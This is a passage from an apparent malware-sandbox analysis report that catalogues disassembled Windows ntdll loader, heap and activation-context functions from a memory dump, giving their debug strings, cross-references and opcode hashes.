                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                • Instruction ID: 818bfba3cd7109edaa4554f3fd8b87b618b50dd5c215031a81312f5a77c406df
                                                • Opcode Fuzzy Hash: 246bb3a9c5de41cfb62f77b45acfd6d7ad27a01ff3b51f3b6bbcdf78716f1082
                                                • Instruction Fuzzy Hash: A90270F1D042299BDB39DB54CD80BE9B7B8AB54704F0141DAEB09A7241DB70AF88CF59
                                                Function 01228B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                • API String ID: 0-2515994595
                                                • Opcode ID: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                • Instruction ID: 2ef0fa6c3c8e18d441357ebe815420a9e8b95e5bd3c3768f8c989257289da071
                                                • Opcode Fuzzy Hash: 3898fb61eaf6ecb96b6dd8c52c65da877fdc7025bb3268967fe02647a72ab599
                                                • Instruction Fuzzy Hash: DD51D171124322ABC32DDF288845BAFBBE8EF98654F54491DFA55C3290E770D608CB92
                                                Function 0119AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-3197712848
                                                • Opcode ID: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                • Instruction ID: 4e8ec9be2ed3846323b8d3427f43d1a305e3390f02a64c417d8d3d02104d6cfe
                                                • Opcode Fuzzy Hash: 74e2552ff357814fd0d5f55f65b6cbc8bcd931863a7cd3357ceb23e98b139dff
                                                • Instruction Fuzzy Hash: 3C12D0716087528FDB2DDB28D444BABBBE4BF84708F09051DF9A58B291E734D948CB93
                                                Function 01230274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                • API String ID: 0-1700792311
                                                • Opcode ID: b65cb8c82c0b97281abf57fed79536f98b5804b17eaf2f8bab169cd14db26d67
                                                • Instruction ID: f393b7e476e906dac97b586d94e9d7f9c492b23a73b32a5d3ee6d1dad5593dfe
                                                • Opcode Fuzzy Hash: b65cb8c82c0b97281abf57fed79536f98b5804b17eaf2f8bab169cd14db26d67
                                                • Instruction Fuzzy Hash: 57D1F1B1520286DFDB2ADF68D441AAEBBF1FF89704F088049F6559B352D734D941CB28
                                                Function 012089B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                Download Yara Rule
                                                Strings
                                                • VerifierDlls, xrefs: 01208CBD
                                                • AVRF: -*- final list of providers -*- , xrefs: 01208B8F
                                                • VerifierDebug, xrefs: 01208CA5
                                                • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01208A3D
                                                • HandleTraces, xrefs: 01208C8F
                                                • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01208A67
                                                • VerifierFlags, xrefs: 01208C50
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                                                • API String ID: 0-3223716464
                                                • Opcode ID: 2fd1fc40083df13d619f2f4df16ae287401513d78e080f5cc95f92f95e4cbb1d
                                                • Instruction ID: 49d5f4fc6ca58f62a4a41a80a8454a15d50be7edddf7cdbca3ce92373b589b73
                                                • Opcode Fuzzy Hash: 2fd1fc40083df13d619f2f4df16ae287401513d78e080f5cc95f92f95e4cbb1d
                                                • Instruction Fuzzy Hash: 47913672E65712AFD727EF28D881B2BBBA4AB54714F050718FA45AB2C2D7709C40CB91
                                                Function 0118EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                • API String ID: 0-1109411897
                                                • Opcode ID: b14e18fe1f9260537033ec17ca5d3b0b2c38744c5f63004738f9b098b6323a64
                                                • Instruction ID: ef452a8c5471467c54e062ae9a24deebee6623112f974cf3a881fa3eb54e7ab4
                                                • Opcode Fuzzy Hash: b14e18fe1f9260537033ec17ca5d3b0b2c38744c5f63004738f9b098b6323a64
                                                • Instruction Fuzzy Hash: C6A24B74E05A2ACFDB68DF58CC887A9BBB5AF49304F1482E9D50DA7650DB309E85CF40
                                                Function 011B63FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-792281065
                                                • Opcode ID: 50c4d5472befd5b76d0bfbc7824efbf0bb33ce88676d81e626c06886c7b4571f
                                                • Instruction ID: c0c71adb3fdd3f0d5c746d9dcfbd6db1b3cca44b7823fc472d5ffe5d4604578b
                                                • Opcode Fuzzy Hash: 50c4d5472befd5b76d0bfbc7824efbf0bb33ce88676d81e626c06886c7b4571f
                                                • Instruction Fuzzy Hash: B1912971B017159BEB3DDF58E888BEBBBA5FB61B18F04012CE61067685D7789801C7D1
                                                Function 0117645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011D9A11, 011D9A3A
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 011D9A01
                                                • LdrpInitShimEngine, xrefs: 011D99F4, 011D9A07, 011D9A30
                                                • apphelp.dll, xrefs: 01176496
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 011D99ED
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 011D9A2A
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: 107d10f8ed04026d079f1fb483ed1838f3f9a008212547cca3635457a5374b8b
                                                • Instruction ID: 963845759e771eed0a310c0f94e73912ac3e5db8ab799989957c892295c9ee6e
                                                • Opcode Fuzzy Hash: 107d10f8ed04026d079f1fb483ed1838f3f9a008212547cca3635457a5374b8b
                                                • Instruction Fuzzy Hash: 4A51A2722087059FE72DDF24D885BABB7E8FB84648F01091DF5959B260E730E944DB93
                                                Function 011B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() passed the empty activation context, xrefs: 011F2165
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 011F2180
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 011F21BF
                                                • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 011F219F
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 011F2178
                                                • RtlGetAssemblyStorageRoot, xrefs: 011F2160, 011F219A, 011F21BA
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                • API String ID: 0-861424205
                                                • Opcode ID: 1696ded0a353fc0a9281c7449486c4d236707085e0a65f19d74334275417b7e2
                                                • Instruction ID: 4415c7b22a8c4ccb62b3d0607b5d546a2758e9d0a383b513cd81bc889e4be027
                                                • Opcode Fuzzy Hash: 1696ded0a353fc0a9281c7449486c4d236707085e0a65f19d74334275417b7e2
                                                • Instruction Fuzzy Hash: 7F313536B402117BE72D8A9A8C81FAA7A6CDB65A54F09015DFB04A7180D370EE01C6A5
                                                Function 011BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011BC6C3
                                                • LdrpInitializeImportRedirection, xrefs: 011F8177, 011F81EB
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 011F8181, 011F81F5
                                                • LdrpInitializeProcess, xrefs: 011BC6C4
                                                • Loading import redirection DLL: '%wZ', xrefs: 011F8170
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 011F81E5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: 0db956655d65192168778359e59b0d630eee00950aa2bb93463ee210f2aa42e2
                                                • Instruction ID: 35fb550e4bae368fc01d7aa37d88bb6b77f4582e4c95e7b21df292c9eec61507
                                                • Opcode Fuzzy Hash: 0db956655d65192168778359e59b0d630eee00950aa2bb93463ee210f2aa42e2
                                                • Instruction Fuzzy Hash: 9331E2716487469FD32CEF28DC86E6BBB94AF94B14F05055CF944AB291E720EC04C7A2
                                                Function 011C096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 011C2DF0: LdrInitializeThunk.NTDLL ref: 011C2DFA
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BA3
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0BB6
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D60
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 011C0D74
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                • String ID:
                                                • API String ID: 1404860816-0
                                                • Opcode ID: 5b6b9f4738d766b9e32f16d1d07d0f274482589ba70ee30ee24d95d21dd4e803
                                                • Instruction ID: 1c27d4d50ca3d77073082a8f07f42396e45fc302bf54bd1a9f4fb7e0231927a5
                                                • Opcode Fuzzy Hash: 5b6b9f4738d766b9e32f16d1d07d0f274482589ba70ee30ee24d95d21dd4e803
                                                • Instruction Fuzzy Hash: 49426C75900719DFDB29CF28C880BAAB7F4BF58704F1445ADE989DB241E770AA84CF61
                                                Function 0118A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                • API String ID: 0-379654539
                                                • Opcode ID: 4f85107bddfe685adad2cb23eeefb04528bc3e70748b8c950c9b28edaf531594
                                                • Instruction ID: 7175949b0432467fc9d52810a84c3c5a49bce24f10423afd0bf47dd69258de7f
                                                • Opcode Fuzzy Hash: 4f85107bddfe685adad2cb23eeefb04528bc3e70748b8c950c9b28edaf531594
                                                • Instruction Fuzzy Hash: B5C18B74108782CFDB19EF58D044B6AB7E4BF84708F04896AF9958B251E738DA49CF63
                                                Function 011B8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011B8421
                                                • LdrpInitializeProcess, xrefs: 011B8422
                                                • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 011B855E
                                                • @, xrefs: 011B8591
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-1918872054
                                                • Opcode ID: 21caa39026ddaf263a737bfec87e1b551d5952c3d9c5a32139d4d07f872b01d3
                                                • Instruction ID: 29b824c101b1f21a9548b0cd655751a6ed514fcb9c113227d99f0e9a1d4111da
                                                • Opcode Fuzzy Hash: 21caa39026ddaf263a737bfec87e1b551d5952c3d9c5a32139d4d07f872b01d3
                                                • Instruction Fuzzy Hash: B3917D71508345AFD72ADF65CC80FABBAECBF94B48F40092EFA8492151E734D944CB62
                                                Function 011B273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() passed the empty activation context, xrefs: 011F21DE
                                                • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 011F21D9, 011F22B1
                                                • .Local, xrefs: 011B28D8
                                                • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 011F22B6
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                • API String ID: 0-1239276146
                                                • Opcode ID: 66c523b4120332fcadb96d7aced21000a8db338d8eef805ade98caad223a0c9a
                                                • Instruction ID: e9bf1a69f7c796f6f515268de338635f10f3000d98078c4417c7b74926841f69
                                                • Opcode Fuzzy Hash: 66c523b4120332fcadb96d7aced21000a8db338d8eef805ade98caad223a0c9a
                                                • Instruction Fuzzy Hash: ECA1DF35900229DBDB29CF68C8C8BE9B7B1BF58354F1541EAD908A7251E730EE85CF90
                                                Function 011B4AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 011F3437
                                                • SXS: %s() called with invalid flags 0x%08lx, xrefs: 011F342A
                                                • RtlDeactivateActivationContext, xrefs: 011F3425, 011F3432, 011F3451
                                                • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 011F3456
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                • API String ID: 0-1245972979
                                                • Opcode ID: 84aeaa38f0717c0cd0292cccfe01baf70c3b6dd1c68fc2068ff7e04d741f3aee
                                                • Instruction ID: d6bdc896f53c0ed33cb251a434b5efac00cc78a2bf6d7cf140db417af16ec7bf
                                                • Opcode Fuzzy Hash: 84aeaa38f0717c0cd0292cccfe01baf70c3b6dd1c68fc2068ff7e04d741f3aee
                                                • Instruction Fuzzy Hash: 1A613632650B129FD72ECF1DC881B6AB7E5FF90B50F15851DEA669B682C730E801CB91
                                                Function 011864AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                Download Yara Rule
                                                Strings
                                                • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 011E10AE
                                                • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 011E106B
                                                • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 011E1028
                                                • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 011E0FE5
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                • API String ID: 0-1468400865
                                                • Opcode ID: d7c69823e93d80c2d1ba743bf098fa165b932c3316f8811b42c323509e13d361
                                                • Instruction ID: c3c8c9436ce7094e46431aa1c17a3c33b74f542a25dc53193e95c5facab5147b
                                                • Opcode Fuzzy Hash: d7c69823e93d80c2d1ba743bf098fa165b932c3316f8811b42c323509e13d361
                                                • Instruction Fuzzy Hash: EF71D2B19047059FCB25EF58C884B9B7FA8AF54BA4F404568F9488B286D734D588CFE2
                                                Function 011B4D1D Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                                Download Yara Rule
                                                Strings
                                                • Querying the active activation context failed with status 0x%08lx, xrefs: 011F365C
                                                • LdrpFindDllActivationContext, xrefs: 011F3636, 011F3662
                                                • minkernel\ntdll\ldrsnap.c, xrefs: 011F3640, 011F366C
                                                • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 011F362F
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                • API String ID: 0-3779518884
                                                • Opcode ID: abe78279f785403e62e63d7723a2cf1786c3925c9d025d44b01873546728cfe4
                                                • Instruction ID: 0ac70b6a84d624bd359a44c25405e6d8a032159857fab0b019436a8c531750f9
                                                • Opcode Fuzzy Hash: abe78279f785403e62e63d7723a2cf1786c3925c9d025d44b01873546728cfe4
                                                • Instruction Fuzzy Hash: 5B315C32A102119AEF3EDB0CD8C8BFE76A8BB21654F07C029D61B57963D7A09D80C7C5
                                                Function 011A245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011EA9A2
                                                • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 011EA992
                                                • apphelp.dll, xrefs: 011A2462
                                                • LdrpDynamicShimModule, xrefs: 011EA998
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-176724104
                                                • Opcode ID: 14c1b4192118e3f7d72cafd7f1b7c80ef333b78b568ed7980c51d757cbf8db35
                                                • Instruction ID: 8a161be0aee56fd446110606256b3592e70686c364ed37525dae2eeccc39e5e2
                                                • Opcode Fuzzy Hash: 14c1b4192118e3f7d72cafd7f1b7c80ef333b78b568ed7980c51d757cbf8db35
                                                • Instruction Fuzzy Hash: 29314675600701ABEB3DDF99B88DAABBBF4FF80B14F160019E901A7245D7B09881CB80
                                                Function 011929A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                Download Yara Rule
                                                Strings
                                                • HEAP: , xrefs: 01193264
                                                • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0119327D
                                                • HEAP[%wZ]: , xrefs: 01193255
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                • API String ID: 0-617086771
                                                • Opcode ID: 1b254b6f539d2257e625b81e9f6d13a9b35e83b487a9d7fbb11ea5179445e77b
                                                • Instruction ID: 126feecf34a8544c5287ccbefab093118a7229315e5f6a83ec50e792ee075039
                                                • Opcode Fuzzy Hash: 1b254b6f539d2257e625b81e9f6d13a9b35e83b487a9d7fbb11ea5179445e77b
                                                • Instruction Fuzzy Hash: F992CD71A042499FEF29CFA8C444BAEBBF1FF48304F188059E86AAB351D735A941CF51
                                                Function 01190770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-4253913091
                                                • Opcode ID: 036711e0473463e2ebb5db6b0c78c199b0dd2feae36ea0f1f0c1502fbc56ac39
                                                • Instruction ID: da9e3102f34fac15eed896de9ddea1fda5d4de7b29e7e460f52faa6e590c14cd
                                                • Opcode Fuzzy Hash: 036711e0473463e2ebb5db6b0c78c199b0dd2feae36ea0f1f0c1502fbc56ac39
                                                • Instruction Fuzzy Hash: F3F19E34A00A06DFEB1DCFA8C894B6AB7FAFF49704F144168E5269B341D734E981CB91
                                                Function 011A6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $@
                                                • API String ID: 0-1077428164
                                                • Opcode ID: 587eab3430aad9a93747f94c10798e13419bb59731da6a8838135467c1a1a334
                                                • Instruction ID: ffcbc9117ef546dcb11f41ce3603ea55a3f5bfe61cf1c97fd908c520b9cfb03b
                                                • Opcode Fuzzy Hash: 587eab3430aad9a93747f94c10798e13419bb59731da6a8838135467c1a1a334
                                                • Instruction Fuzzy Hash: 41C2C0756087418FEB2DCF28C880BABBBE5AF88714F45892DF989C7241D735D905CB92
                                                Function 0117A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000009.00000002.1875207587.0000000001150000.00000040.00001000.00020000.00000000.sdmp, Offset: 01150000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_9_2_1150000_C6Abn5cBei.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: FilterFullPath$UseFilter$\??\
                                                • API String ID: 0-2779062949
                                                • Opcode ID: 3ec47ea318d535e989cb894415870fe1b91ce77bcdd706703152e4bc0d78ea02
                                                • Instruction ID: 6e365bfc94d573ffcffcf0db11ff74cd917d50f32b4543d254b6127dafb1d1cf
                                                • Opcode Fuzzy Hash: 3ec47ea318d535e989cb894415870fe1b91ce77bcdd706703152e4bc0d78ea02
                                                • Instruction Fuzzy Hash: BAA190719112299BDB39DF68CC88BEEB7B8EF44714F0005E9E908A7250DB359E84CF90
                                                Function 011A0BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrinit.c, xrefs: 011EA121
                                                • Failed to allocated memory for shimmed module list, xrefs: 011EA10F
                                                • LdrpCheckModule, xrefs: 011EA117
                                                Memory Dump Source
